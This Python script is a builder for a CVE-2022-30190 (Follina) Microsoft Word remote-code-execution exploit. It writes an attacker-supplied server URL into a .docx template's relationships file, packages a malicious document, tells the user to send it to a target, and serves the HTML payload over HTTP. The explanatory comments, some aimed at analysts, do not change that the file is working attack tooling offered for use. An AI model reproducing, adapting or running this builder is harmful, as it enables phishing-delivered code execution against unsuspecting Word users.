#!/usr/bin/env python3
import sys
import os
import subprocess
# Directory, relative to the current working directory, that start_server()
# changes into and serves over HTTP. generate_payload() hard-codes the same
# 'srv/' path instead of using this constant.
HOST_DIR = 'srv/'
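def usage():
    """Print the command-line synopsis with one example per mode, then exit.

    Reads ``sys.argv[0]`` for the program name. Never returns: the process
    ends with the default exit status once the text has been printed.
    """
    prog = str(sys.argv[0])
    print('[%] Usage: ' + prog + ' <generate/host> <options>')
    print('[i] Example: ' + prog + ' generate http://192.168.1.41')
    print('[i] Example: sudo ' + prog + ' host 80')
    # sys.exit() rather than the bare exit(): the latter is injected by the
    # `site` module for interactive use and is missing under `python -S`.
    sys.exit()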
def check_usage():
    """Validate ``sys.argv`` and return the numeric code of the chosen mode.

    Returns:
        1 for ``generate`` and 2 for ``host``. Any other mode word, or an
        argument count other than exactly one option after the mode, calls
        ``usage()``, which prints help and exits.
    """
    argc = len(sys.argv)
    if argc < 2:
        usage()
    # Both modes take exactly one option, so the argument-count rule is shared.
    mode_codes = {'generate': 1, 'host': 2}
    selected = mode_codes.get(sys.argv[1], 0)
    if selected == 0 or argc != 3:
        usage()
    return selected
def execute_cmd(cmd):
    """Run *cmd* through the system shell and return its captured output.

    Thin wrapper over ``subprocess.getoutput``. The exit status is discarded,
    so a failed command can only be told apart from a successful one by
    reading the returned text.
    """
    # getoutput() hands the whole string to a shell; every call site in this
    # file passes a fixed literal, never text taken from the command line.
    return subprocess.getoutput(cmd)
def generate_payload():
    """Build ``out/document.docx`` from the bundled template and reset ``srv/word.html``.

    Takes the server base URL from ``sys.argv[2]``, copies the template tree
    ``data/word_dat/`` to a scratch directory, rewrites one placeholder in
    ``word/_rels/document.xml.rels``, zips the scratch tree into a .docx,
    copies it to ``out/`` and finally copies ``srv/backup.html`` over
    ``srv/word.html``.

    All paths are relative, so the function only works when the current
    working directory contains ``data/``, ``out/`` and ``srv/``. It leaves the
    process inside ``srv/`` when it returns. None of the shell commands have
    their exit status checked, so the closing success messages are printed
    even if a step failed.
    """
    # The URL is used exactly as typed: no scheme check and no XML escaping
    # is applied before it is written into the .rels part below.
    srv_url = sys.argv[2]
    print('\n[ == Options == ]')
    print('\t[ HTML Exploit URL: ' + str(srv_url))
    print('')
    # Work on a throw-away copy so the template under data/word_dat/ stays pristine.
    execute_cmd('cp -r data/word_dat/ data/tmp_doc/')
    print('[*] Writing HTML Server URL...')
    rels_pr = open('data/tmp_doc/word/_rels/document.xml.rels', 'r')
    xml_content = rels_pr.read()
    rels_pr.close()
    # The only per-build change to the document: the placeholder becomes
    # "<srv_url>/word.html". For anyone triaging a sample produced by this
    # script, word/_rels/document.xml.rels is therefore the part that holds
    # the remote address (presumably as a relationship target; the template
    # itself is not shown here, so confirm against data/word_dat/).
    xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
    rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
    rels_pw.write(xml_content)
    rels_pw.close()
    print('[*] Generating malicious docx file...')
    # zip is run from inside the scratch tree so archive member paths start
    # at the package root rather than at data/tmp_doc/.
    os.chdir('data/tmp_doc/')
    os.system('zip -r document.docx *')
    execute_cmd('cp document.docx ../../out/document.docx')
    # Step back to data/ and delete the scratch copy.
    os.chdir('../')
    execute_cmd('rm -R tmp_doc/')
    # Back to the starting directory, then into srv/.
    os.chdir('../')
    print('[*] Updating information on HTML exploit...')
    os.chdir('srv/')
    # word.html (the page the document's URL points at) is restored from
    # backup.html; nothing in this function edits its content.
    execute_cmd('cp backup.html word.html')
    print('[+] Malicious Word Document payload generated at: out/document.docx')
    print('[i] You can execute now the server and then send document.docx to target')
    return
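def start_server():
    """Serve the ``HOST_DIR`` directory over HTTP on the port in ``sys.argv[2]``.

    Changes the working directory to ``HOST_DIR`` and then runs
    ``python3 -m http.server <port>`` in the foreground. If the port argument
    is not an integer, prints an error and exits instead.
    """
    os.chdir(HOST_DIR)
    try:
        port = int(sys.argv[2])
    except ValueError:
        # Only a malformed number is expected here; the previous bare
        # `except:` would also have swallowed KeyboardInterrupt/SystemExit.
        print('[-] Invalid port specified!')
        # sys.exit() instead of the site-provided exit() helper.
        sys.exit()
    # `port` is an int at this point, so the concatenated command string
    # cannot carry additional shell syntax.
    # NOTE: http.server listens on every interface unless --bind is given and
    # produces directory listings, so everything under HOST_DIR is readable by
    # any host that can reach this machine on that port.
    os.system('python3 -m http.server ' + str(port))
    return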
if __name__ == '__main__':
    # Script entry point: print the banner, validate the arguments, then
    # dispatch on the mode code returned by check_usage()
    # (1 = generate, 2 = host).
    print('[%] CVE-2022-30190 - MS Office Word RCE Exploit [%]')
    mode = check_usage()
    if mode not in (1, 2):
        # check_usage() exits on bad input, so this is a defensive fallback.
        print('[-] Unknown error')
        exit()
    if mode == 1:
        print('[*] Option is generate a malicious payload...')
        generate_payload()
    else:
        print('[*] Option is host HTML Exploit...')
        start_server()